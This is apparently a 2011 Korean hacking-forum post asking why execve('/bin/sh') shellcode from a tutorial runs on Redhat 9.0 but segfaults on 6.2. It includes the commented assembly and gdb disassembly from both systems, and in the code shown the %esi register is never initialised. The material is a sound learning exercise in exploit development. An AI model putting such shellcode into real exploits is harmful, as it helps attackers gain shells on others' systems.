|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1546 [복사]
Redhat 9.0에서 쉘코드 만들기 문서를 참고해서 실습해봤는데 거기서 잘되던 코드를 6.2에서 적용해볼려니까 되지않네요
컴파일은 똑같이 되는데 실행하면 세그먼테이션 폴트가뜹니다.
이거 커널버전이 달라서 execve함수 구조도 달라서 그런가요? 아니면 컴파일러(gcc)버전차이 때문인가요?
주석은 한번 달아봤어요..
.globl main
main:
jmp come_here
func:
//execve("/bin/sh"주소,["/bin/sh"]+[0]배열 포인터 시작주소,NULL);
movl $0x0b, %eax
//execve system call number 11
popl %ebx
//execve 인자 1
//배열포인터는 esi를 사용함
movl %ebx, (%esi)
//Arrangement pointer("/bin/sh"address)
movl $0x00, 0x4(%esi)
//배열 포인터+4(0)
//배열포인터 시작주소
leal (%esi), %ecx
//execve 인자 2
movl $0x00, %edx
//execve 인자 3
int $0x80
//Interrupt!
//exit(0)
movl $0x01, %eax
//exit 인자 1
movl $0x00, %ebx
//exit system call number 0
int $0x80
//Interrupt!
come_here:
call func
.string "/bin/sh\00"
6.2 gdb로 분석
(gdb) disas main
Dump of assembler code for function main:
0x8048398 <main>: jmp 0x80483be <come_here>
End of assembler dump.
(gdb) disas come_here
Dump of assembler code for function come_here:
0x80483be <come_here>: call 0x804839a <func>
0x80483c3 <come_here+5>: das
0x80483c4 <come_here+6>: bound %ebp,0x6e(%ecx)
0x80483c7 <come_here+9>: das
0x80483c8 <come_here+10>: jae 0x8048432
0x80483ca <come_here+12>: add %al,(%eax)
0x80483cc <come_here+14>: nop
0x80483cd <come_here+15>: nop
0x80483ce <come_here+16>: nop
0x80483cf <come_here+17>: nop
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x804839a <func>: mov $0xb,%eax
0x804839f <func+5>: pop %ebx
0x80483a0 <func+6>: mov %ebx,(%esi)
0x80483a2 <func+8>: movl $0x0,0x4(%esi)
0x80483a9 <func+15>: lea (%esi),%ecx
0x80483ab <func+17>: mov $0x0,%edx
0x80483b0 <func+22>: int $0x80
0x80483b2 <func+24>: mov $0x1,%eax
0x80483b7 <func+29>: mov $0x0,%ebx
0x80483bc <func+34>: int $0x80
End of assembler dump.
9.0 gdb로 분석(9.0에선 제대로 동작함)
(gdb) disas main
Dump of assembler code for function main:
0x080482f4 <main+0>: jmp 0x804831a <come_here>
End of assembler dump.
(gdb) disas come_here
Dump of assembler code for function come_here:
0x0804831a <come_here+0>: call 0x80482f6 <func>
0x0804831f <come_here+5>: das
0x08048320 <come_here+6>: bound %ebp,0x6e(%ecx)
0x08048323 <come_here+9>: das
0x08048324 <come_here+10>: jae 0x804838e <__do_global_ctors_aux+2>
0x08048326 <come_here+12>: add %al,(%eax)
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x080482f6 <func+0>: mov $0xb,%eax
0x080482fb <func+5>: pop %ebx
0x080482fc <func+6>: mov %ebx,(%esi)
0x080482fe <func+8>: movl $0x0,0x4(%esi)
0x08048305 <func+15>: lea (%esi),%ecx
0x08048307 <func+17>: mov $0x0,%edx
0x0804830c <func+22>: int $0x80
0x0804830e <func+24>: mov $0x1,%eax
0x08048313 <func+29>: mov $0x0,%ebx
0x08048318 <func+34>: int $0x80
End of assembler dump.
(come_here의 call문 뒷쪽은 .string "/bin/sh\00" 부분을 어셈으로 나타내다보니 저렇게 된겁니다.)
|
Hit : 4137 Date : 2011/12/04 11:18
|